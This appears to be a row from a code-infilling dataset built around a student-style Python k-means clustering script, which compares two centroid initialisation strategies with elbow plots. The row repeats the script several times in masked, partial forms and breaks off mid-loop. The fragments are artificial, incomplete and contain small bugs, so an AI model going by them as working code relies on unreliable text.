code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
<|reserved_special_token_0|>
def map_cluster_data(data, K):
clusterDataMap = {}
for k in range(K):
clusterDataMap[k + 1] = np.array([]).reshape(2, 0)
for i in range(m):
clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]],
data.iloc[i]]
for k in range(K):
clusterDataMap[k + 1] = clusterDataMap[k + 1].T
return clusterDataMap
def centroid(clusterDataMap, Centroids):
for k in range(K):
Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)
return Centroids
<|reserved_special_token_0|>
def initialize_centroids_strategy2(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
if i == 0:
rand = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[rand]]
data = data.drop(data.index[rand])
else:
centroidMean = np.mean(Centroids, axis=1)
index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2,
axis=1)), axis=1)
Centroids = np.c_[Centroids, data.iloc[index]]
data = data.drop(data.index[index])
return Centroids
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def assign(data, Centroids):
EuclideanDistance = np.array([]).reshape(m, 0)
for k in range(K):
dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)
EuclideanDistance = np.c_[EuclideanDistance, dist]
Clusters = np.argmin(EuclideanDistance, axis=1) + 1
return Clusters
def map_cluster_data(data, K):
clusterDataMap = {}
for k in range(K):
clusterDataMap[k + 1] = np.array([]).reshape(2, 0)
for i in range(m):
clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]],
data.iloc[i]]
for k in range(K):
clusterDataMap[k + 1] = clusterDataMap[k + 1].T
return clusterDataMap
def centroid(clusterDataMap, Centroids):
for k in range(K):
Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)
return Centroids
def initialize_centroids(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
randIndex = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[randIndex]]
return Centroids
def initialize_centroids_strategy2(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
if i == 0:
rand = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[rand]]
data = data.drop(data.index[rand])
else:
centroidMean = np.mean(Centroids, axis=1)
index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2,
axis=1)), axis=1)
Centroids = np.c_[Centroids, data.iloc[index]]
data = data.drop(data.index[index])
return Centroids
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print("""
Program Started :""", time.asctime())
def assign(data, Centroids):
EuclideanDistance = np.array([]).reshape(m, 0)
for k in range(K):
dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)
EuclideanDistance = np.c_[EuclideanDistance, dist]
Clusters = np.argmin(EuclideanDistance, axis=1) + 1
return Clusters
def map_cluster_data(data, K):
clusterDataMap = {}
for k in range(K):
clusterDataMap[k + 1] = np.array([]).reshape(2, 0)
for i in range(m):
clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]],
data.iloc[i]]
for k in range(K):
clusterDataMap[k + 1] = clusterDataMap[k + 1].T
return clusterDataMap
def centroid(clusterDataMap, Centroids):
for k in range(K):
Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)
return Centroids
def initialize_centroids(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
randIndex = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[randIndex]]
return Centroids
def initialize_centroids_strategy2(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
if i == 0:
rand = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[rand]]
data = data.drop(data.index[rand])
else:
centroidMean = np.mean(Centroids, axis=1)
index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2,
axis=1)), axis=1)
Centroids = np.c_[Centroids, data.iloc[index]]
data = data.drop(data.index[index])
return Centroids
<|reserved_special_token_0|>
print('Strategy 1 : First Iteration')
<|reserved_special_token_0|>
for K in range(2, 11):
Centroids = initialize_centroids(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
<|reserved_special_token_0|>
plt.figure()
plt.plot(KMeans_array, WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print('Strategy 1 : Second Iteration')
<|reserved_special_token_0|>
for K in range(2, 11):
Centroids = initialize_centroids(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
<|reserved_special_token_0|>
plt.figure()
plt.plot(KMeans_array, WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print('Strategy 2 : First Iteration')
<|reserved_special_token_0|>
for K in range(2, 11):
Centroids = initialize_centroids_strategy2(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
<|reserved_special_token_0|>
plt.figure()
plt.plot(KMeans_array, WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy2 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print('Strategy 2 : Second Iteration')
<|reserved_special_token_0|>
for K in range(2, 11):
Centroids = initialize_centroids_strategy2(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
<|reserved_special_token_0|>
plt.figure()
plt.plot(KMeans_array, WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy2 - Run 2: Elbow Chart to identify optimum cluster number')
plt.show()
print('\nProgram Ended :', time.asctime())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print("""
Program Started :""", time.asctime())
def assign(data, Centroids):
EuclideanDistance = np.array([]).reshape(m, 0)
for k in range(K):
dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)
EuclideanDistance = np.c_[EuclideanDistance, dist]
Clusters = np.argmin(EuclideanDistance, axis=1) + 1
return Clusters
def map_cluster_data(data, K):
clusterDataMap = {}
for k in range(K):
clusterDataMap[k + 1] = np.array([]).reshape(2, 0)
for i in range(m):
clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]],
data.iloc[i]]
for k in range(K):
clusterDataMap[k + 1] = clusterDataMap[k + 1].T
return clusterDataMap
def centroid(clusterDataMap, Centroids):
for k in range(K):
Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)
return Centroids
def initialize_centroids(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
randIndex = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[randIndex]]
return Centroids
def initialize_centroids_strategy2(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
if i == 0:
rand = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[rand]]
data = data.drop(data.index[rand])
else:
centroidMean = np.mean(Centroids, axis=1)
index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2,
axis=1)), axis=1)
Centroids = np.c_[Centroids, data.iloc[index]]
data = data.drop(data.index[index])
return Centroids
Numpyfile = scipy.io.loadmat(
'C:\\Projects\\MCS\\CSE575\\Project 2 - KMeans\\data.mat')
data = pd.DataFrame(Numpyfile['AllSamples'])
data.columns = ['x1', 'x2']
m = data.shape[0]
n = data.shape[1]
n_iter = 50
color = ['red', 'blue', 'green', 'cyan', 'magenta', 'grey', 'yellow',
'orange', 'black', 'purple']
labels = ['cluster1', 'cluster2', 'cluster3', 'cluster4', 'cluster5',
'cluster6', 'cluster7', 'cluster8', 'cluster9', 'cluster10']
print('Strategy 1 : First Iteration')
WCSS_array = np.array([])
for K in range(2, 11):
Centroids = initialize_centroids(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
KMeans_array = np.arange(2, 11, 1)
plt.figure()
plt.plot(KMeans_array, WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print('Strategy 1 : Second Iteration')
WCSS_array = np.array([])
for K in range(2, 11):
Centroids = initialize_centroids(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
KMeans_array = np.arange(2, 11, 1)
plt.figure()
plt.plot(KMeans_array, WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print('Strategy 2 : First Iteration')
WCSS_array = np.array([])
for K in range(2, 11):
Centroids = initialize_centroids_strategy2(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
KMeans_array = np.arange(2, 11, 1)
plt.figure()
plt.plot(KMeans_array, WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy2 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print('Strategy 2 : Second Iteration')
WCSS_array = np.array([])
for K in range(2, 11):
Centroids = initialize_centroids_strategy2(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
KMeans_array = np.arange(2, 11, 1)
plt.figure()
plt.plot(KMeans_array, WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy2 - Run 2: Elbow Chart to identify optimum cluster number')
plt.show()
print('\nProgram Ended :', time.asctime())
<|reserved_special_token_1|>
# Project Overview
# Implement the k-means algorithm and apply your implementation on the given dataset,
# which contains a set of 2-D points.
# Import Libraries
import scipy.io
import pandas as pd
import matplotlib.pyplot as plt
import random
import numpy as np
import time
print("\nProgram Started :",time.asctime())
# Function to assign data to clusters using minimum euclidean distance to centroids.
# Inout: Data and Centroids
# Output: Assigned Clusters
def assign(data,Centroids):
EuclideanDistance = np.array([]).reshape(m, 0)
for k in range(K):
dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)
EuclideanDistance = np.c_[EuclideanDistance, dist]
Clusters = np.argmin(EuclideanDistance, axis=1) + 1
return(Clusters)
# Function to map clusters and the respective data points
# Input: data and number of clusters
# Output: Map Cluster to Data Points
def map_cluster_data(data, K):
clusterDataMap = {}
for k in range(K):
clusterDataMap[k + 1] = np.array([]).reshape(2, 0)
for i in range(m):
clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]], data.iloc[i]]
for k in range(K):
clusterDataMap[k + 1] = clusterDataMap[k + 1].T
return(clusterDataMap)
# Function to calculate centroid
# Input: Map with cluster and Data Points and Centroids
# Output: New centroids which are calculated from the data mapping of clusters
def centroid(clusterDataMap,Centroids):
for k in range(K):
Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)
return(Centroids)
# Strategy 1 - Cluster Initialization
# Function to initialize cluster centroids randomly
# Input: Data and Number of Clusters
# Output: Centroids
def initialize_centroids(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
randIndex = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[randIndex]]
return(Centroids)
# Strategy 2 - Cluster Initialization
# Function to initialize cluster centroids randomly
# Input: Data and Number of Clusters
# Output: Centroids
def initialize_centroids_strategy2(data, K):
Centroids = np.array([]).reshape(data.shape[1], 0)
for i in range(K):
if i ==0:
rand = random.randint(0, data.shape[0] - 1)
Centroids = np.c_[Centroids, data.iloc[rand]]
# centroidIndexes.append(rand)
data=data.drop(data.index[rand])
else:
centroidMean = np.mean(Centroids,axis=1)
index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2, axis=1)), axis=1)
# centroidIndexes.append(index)
Centroids = np.c_[Centroids, data.iloc[index]]
data = data.drop(data.index[index])
return(Centroids)
# Read Data
Numpyfile= scipy.io.loadmat("C:\\Projects\\MCS\\CSE575\\Project 2 - KMeans\\data.mat")
data = pd.DataFrame(Numpyfile['AllSamples'])
data.columns=['x1','x2']
m = data.shape[0]
n = data.shape[1]
# Initialize Prameters
n_iter = 50
# Initialize plot parameters
color=['red','blue','green','cyan','magenta','grey', 'yellow', 'orange', 'black', 'purple']
labels=['cluster1','cluster2','cluster3','cluster4','cluster5','cluster6', 'cluster7','cluster8','cluster9','cluster10']
#
print("Strategy 1 : First Iteration")
# ********* Strategy 1 ************
# Randomly pick the initial centers from the given samples.
# First run with cluster initiation
# Run K-Means with clusters in the range of 2 - 10
WCSS_array=np.array([])
for K in range(2,11):
Centroids = initialize_centroids(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
# Compute Objective functions
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
# Plot the objective function
KMeans_array=np.arange(2,11,1)
plt.figure()
plt.plot(KMeans_array,WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print("Strategy 1 : Second Iteration")
# Second run with different cluster initiation
# Run K-Means with clusters in the range of 2 - 10
WCSS_array=np.array([])
for K in range(2,11):
Centroids = initialize_centroids(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
# Compute Objective functions
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
# Plot the objective function
KMeans_array=np.arange(2,11,1)
plt.figure()
plt.plot(KMeans_array,WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print("Strategy 2 : First Iteration")
# ********** Strategy 2 ************
# Strategy 2: pick the first center randomly; for the i-th center (i>1),
# choose a sample (among all possible samples) such that the average distance of this
# chosen one to all previous (i-1) centers is maximal.
# First run with cluster initiation
# Run K-Means with clusters in the range of 2 - 10
WCSS_array=np.array([])
for K in range(2,11):
Centroids = initialize_centroids_strategy2(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
# Plot the objective function: Strategy 2 - First initialization
KMeans_array=np.arange(2,11,1)
plt.figure()
plt.plot(KMeans_array,WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy2 - Run 1: Elbow Chart to identify optimum cluster number')
plt.show()
print("Strategy 2 : Second Iteration")
# Second run with different cluster initiation
# Run K-Means with clusters in the range of 2 - 10
WCSS_array=np.array([])
for K in range(2,11):
Centroids = initialize_centroids_strategy2(data, K)
for i in range(n_iter):
clusters = assign(data, Centroids)
clusterDataMap = map_cluster_data(data, K)
Centroids = centroid(clusterDataMap, Centroids)
wcss = 0
for k in range(K):
wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)
WCSS_array = np.append(WCSS_array, wcss)
# Plot the objective function: Strategy 2 - First initialization
KMeans_array=np.arange(2,11,1)
plt.figure()
plt.plot(KMeans_array,WCSS_array)
plt.xlabel('Number of Clusters')
plt.ylabel('within-cluster sums of squares (WCSS)')
plt.title('Strategy2 - Run 2: Elbow Chart to identify optimum cluster number')
plt.show()
print("\nProgram Ended :",time.asctime())
|
flexible
|
{
"blob_id": "b734a4405d1f5b3650d7149ae80e14548e2dbda4",
"index": 4297,
"step-1": "<mask token>\n\n\ndef map_cluster_data(data, K):\n clusterDataMap = {}\n for k in range(K):\n clusterDataMap[k + 1] = np.array([]).reshape(2, 0)\n for i in range(m):\n clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]],\n data.iloc[i]]\n for k in range(K):\n clusterDataMap[k + 1] = clusterDataMap[k + 1].T\n return clusterDataMap\n\n\ndef centroid(clusterDataMap, Centroids):\n for k in range(K):\n Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)\n return Centroids\n\n\n<mask token>\n\n\ndef initialize_centroids_strategy2(data, K):\n Centroids = np.array([]).reshape(data.shape[1], 0)\n for i in range(K):\n if i == 0:\n rand = random.randint(0, data.shape[0] - 1)\n Centroids = np.c_[Centroids, data.iloc[rand]]\n data = data.drop(data.index[rand])\n else:\n centroidMean = np.mean(Centroids, axis=1)\n index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2,\n axis=1)), axis=1)\n Centroids = np.c_[Centroids, data.iloc[index]]\n data = data.drop(data.index[index])\n return Centroids\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef assign(data, Centroids):\n EuclideanDistance = np.array([]).reshape(m, 0)\n for k in range(K):\n dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)\n EuclideanDistance = np.c_[EuclideanDistance, dist]\n Clusters = np.argmin(EuclideanDistance, axis=1) + 1\n return Clusters\n\n\ndef map_cluster_data(data, K):\n clusterDataMap = {}\n for k in range(K):\n clusterDataMap[k + 1] = np.array([]).reshape(2, 0)\n for i in range(m):\n clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]],\n data.iloc[i]]\n for k in range(K):\n clusterDataMap[k + 1] = clusterDataMap[k + 1].T\n return clusterDataMap\n\n\ndef centroid(clusterDataMap, Centroids):\n for k in range(K):\n Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)\n return Centroids\n\n\ndef initialize_centroids(data, K):\n Centroids = np.array([]).reshape(data.shape[1], 0)\n for i in range(K):\n randIndex = random.randint(0, data.shape[0] - 1)\n Centroids = np.c_[Centroids, data.iloc[randIndex]]\n return Centroids\n\n\ndef initialize_centroids_strategy2(data, K):\n Centroids = np.array([]).reshape(data.shape[1], 0)\n for i in range(K):\n if i == 0:\n rand = random.randint(0, data.shape[0] - 1)\n Centroids = np.c_[Centroids, data.iloc[rand]]\n data = data.drop(data.index[rand])\n else:\n centroidMean = np.mean(Centroids, axis=1)\n index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2,\n axis=1)), axis=1)\n Centroids = np.c_[Centroids, data.iloc[index]]\n data = data.drop(data.index[index])\n return Centroids\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint(\"\"\"\nProgram Started :\"\"\", time.asctime())\n\n\ndef assign(data, Centroids):\n EuclideanDistance = np.array([]).reshape(m, 0)\n for k in range(K):\n dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)\n EuclideanDistance = np.c_[EuclideanDistance, dist]\n Clusters = np.argmin(EuclideanDistance, axis=1) + 1\n return Clusters\n\n\ndef map_cluster_data(data, K):\n clusterDataMap = {}\n for k in range(K):\n clusterDataMap[k + 1] = np.array([]).reshape(2, 0)\n for i in range(m):\n clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]],\n data.iloc[i]]\n for k in range(K):\n clusterDataMap[k + 1] = clusterDataMap[k + 1].T\n return clusterDataMap\n\n\ndef centroid(clusterDataMap, Centroids):\n for k in range(K):\n Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)\n return Centroids\n\n\ndef initialize_centroids(data, K):\n Centroids = np.array([]).reshape(data.shape[1], 0)\n for i in range(K):\n randIndex = random.randint(0, data.shape[0] - 1)\n Centroids = np.c_[Centroids, data.iloc[randIndex]]\n return Centroids\n\n\ndef initialize_centroids_strategy2(data, K):\n Centroids = np.array([]).reshape(data.shape[1], 0)\n for i in range(K):\n if i == 0:\n rand = random.randint(0, data.shape[0] - 1)\n Centroids = np.c_[Centroids, data.iloc[rand]]\n data = data.drop(data.index[rand])\n else:\n centroidMean = np.mean(Centroids, axis=1)\n index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2,\n axis=1)), axis=1)\n Centroids = np.c_[Centroids, data.iloc[index]]\n data = data.drop(data.index[index])\n return Centroids\n\n\n<mask token>\nprint('Strategy 1 : First Iteration')\n<mask token>\nfor K in range(2, 11):\n Centroids = initialize_centroids(data, K)\n for i in range(n_iter):\n clusters = assign(data, Centroids)\n clusterDataMap = map_cluster_data(data, K)\n Centroids = centroid(clusterDataMap, Centroids)\n wcss = 0\n for k in range(K):\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\n WCSS_array = np.append(WCSS_array, wcss)\n<mask token>\nplt.figure()\nplt.plot(KMeans_array, WCSS_array)\nplt.xlabel('Number of Clusters')\nplt.ylabel('within-cluster sums of squares (WCSS)')\nplt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')\nplt.show()\nprint('Strategy 1 : Second Iteration')\n<mask token>\nfor K in range(2, 11):\n Centroids = initialize_centroids(data, K)\n for i in range(n_iter):\n clusters = assign(data, Centroids)\n clusterDataMap = map_cluster_data(data, K)\n Centroids = centroid(clusterDataMap, Centroids)\n wcss = 0\n for k in range(K):\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\n WCSS_array = np.append(WCSS_array, wcss)\n<mask token>\nplt.figure()\nplt.plot(KMeans_array, WCSS_array)\nplt.xlabel('Number of Clusters')\nplt.ylabel('within-cluster sums of squares (WCSS)')\nplt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')\nplt.show()\nprint('Strategy 2 : First Iteration')\n<mask token>\nfor K in range(2, 11):\n Centroids = initialize_centroids_strategy2(data, K)\n for i in range(n_iter):\n clusters = assign(data, Centroids)\n clusterDataMap = map_cluster_data(data, K)\n Centroids = centroid(clusterDataMap, Centroids)\n wcss = 0\n for k in range(K):\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\n WCSS_array = np.append(WCSS_array, wcss)\n<mask token>\nplt.figure()\nplt.plot(KMeans_array, WCSS_array)\nplt.xlabel('Number of Clusters')\nplt.ylabel('within-cluster sums of squares (WCSS)')\nplt.title('Strategy2 - Run 1: Elbow Chart to identify optimum cluster number')\nplt.show()\nprint('Strategy 2 : Second Iteration')\n<mask token>\nfor K in range(2, 11):\n Centroids = initialize_centroids_strategy2(data, K)\n for i in range(n_iter):\n clusters = assign(data, Centroids)\n clusterDataMap = map_cluster_data(data, K)\n Centroids = centroid(clusterDataMap, Centroids)\n wcss = 0\n for k in range(K):\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\n WCSS_array = np.append(WCSS_array, wcss)\n<mask token>\nplt.figure()\nplt.plot(KMeans_array, WCSS_array)\nplt.xlabel('Number of Clusters')\nplt.ylabel('within-cluster sums of squares (WCSS)')\nplt.title('Strategy2 - Run 2: Elbow Chart to identify optimum cluster number')\nplt.show()\nprint('\\nProgram Ended :', time.asctime())\n",
"step-4": "<mask token>\nprint(\"\"\"\nProgram Started :\"\"\", time.asctime())\n\n\ndef assign(data, Centroids):\n EuclideanDistance = np.array([]).reshape(m, 0)\n for k in range(K):\n dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)\n EuclideanDistance = np.c_[EuclideanDistance, dist]\n Clusters = np.argmin(EuclideanDistance, axis=1) + 1\n return Clusters\n\n\ndef map_cluster_data(data, K):\n clusterDataMap = {}\n for k in range(K):\n clusterDataMap[k + 1] = np.array([]).reshape(2, 0)\n for i in range(m):\n clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]],\n data.iloc[i]]\n for k in range(K):\n clusterDataMap[k + 1] = clusterDataMap[k + 1].T\n return clusterDataMap\n\n\ndef centroid(clusterDataMap, Centroids):\n for k in range(K):\n Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)\n return Centroids\n\n\ndef initialize_centroids(data, K):\n Centroids = np.array([]).reshape(data.shape[1], 0)\n for i in range(K):\n randIndex = random.randint(0, data.shape[0] - 1)\n Centroids = np.c_[Centroids, data.iloc[randIndex]]\n return Centroids\n\n\ndef initialize_centroids_strategy2(data, K):\n Centroids = np.array([]).reshape(data.shape[1], 0)\n for i in range(K):\n if i == 0:\n rand = random.randint(0, data.shape[0] - 1)\n Centroids = np.c_[Centroids, data.iloc[rand]]\n data = data.drop(data.index[rand])\n else:\n centroidMean = np.mean(Centroids, axis=1)\n index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2,\n axis=1)), axis=1)\n Centroids = np.c_[Centroids, data.iloc[index]]\n data = data.drop(data.index[index])\n return Centroids\n\n\nNumpyfile = scipy.io.loadmat(\n 'C:\\\\Projects\\\\MCS\\\\CSE575\\\\Project 2 - KMeans\\\\data.mat')\ndata = pd.DataFrame(Numpyfile['AllSamples'])\ndata.columns = ['x1', 'x2']\nm = data.shape[0]\nn = data.shape[1]\nn_iter = 50\ncolor = ['red', 'blue', 'green', 'cyan', 'magenta', 'grey', 'yellow',\n 'orange', 'black', 'purple']\nlabels = ['cluster1', 'cluster2', 'cluster3', 'cluster4', 'cluster5',\n 'cluster6', 'cluster7', 'cluster8', 'cluster9', 'cluster10']\nprint('Strategy 1 : First Iteration')\nWCSS_array = np.array([])\nfor K in range(2, 11):\n Centroids = initialize_centroids(data, K)\n for i in range(n_iter):\n clusters = assign(data, Centroids)\n clusterDataMap = map_cluster_data(data, K)\n Centroids = centroid(clusterDataMap, Centroids)\n wcss = 0\n for k in range(K):\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\n WCSS_array = np.append(WCSS_array, wcss)\nKMeans_array = np.arange(2, 11, 1)\nplt.figure()\nplt.plot(KMeans_array, WCSS_array)\nplt.xlabel('Number of Clusters')\nplt.ylabel('within-cluster sums of squares (WCSS)')\nplt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')\nplt.show()\nprint('Strategy 1 : Second Iteration')\nWCSS_array = np.array([])\nfor K in range(2, 11):\n Centroids = initialize_centroids(data, K)\n for i in range(n_iter):\n clusters = assign(data, Centroids)\n clusterDataMap = map_cluster_data(data, K)\n Centroids = centroid(clusterDataMap, Centroids)\n wcss = 0\n for k in range(K):\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\n WCSS_array = np.append(WCSS_array, wcss)\nKMeans_array = np.arange(2, 11, 1)\nplt.figure()\nplt.plot(KMeans_array, WCSS_array)\nplt.xlabel('Number of Clusters')\nplt.ylabel('within-cluster sums of squares (WCSS)')\nplt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')\nplt.show()\nprint('Strategy 2 : First Iteration')\nWCSS_array = np.array([])\nfor K in range(2, 11):\n Centroids = initialize_centroids_strategy2(data, K)\n for i in range(n_iter):\n clusters = assign(data, Centroids)\n clusterDataMap = map_cluster_data(data, K)\n Centroids = centroid(clusterDataMap, Centroids)\n wcss = 0\n for k in range(K):\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\n WCSS_array = np.append(WCSS_array, wcss)\nKMeans_array = np.arange(2, 11, 1)\nplt.figure()\nplt.plot(KMeans_array, WCSS_array)\nplt.xlabel('Number of Clusters')\nplt.ylabel('within-cluster sums of squares (WCSS)')\nplt.title('Strategy2 - Run 1: Elbow Chart to identify optimum cluster number')\nplt.show()\nprint('Strategy 2 : Second Iteration')\nWCSS_array = np.array([])\nfor K in range(2, 11):\n Centroids = initialize_centroids_strategy2(data, K)\n for i in range(n_iter):\n clusters = assign(data, Centroids)\n clusterDataMap = map_cluster_data(data, K)\n Centroids = centroid(clusterDataMap, Centroids)\n wcss = 0\n for k in range(K):\n 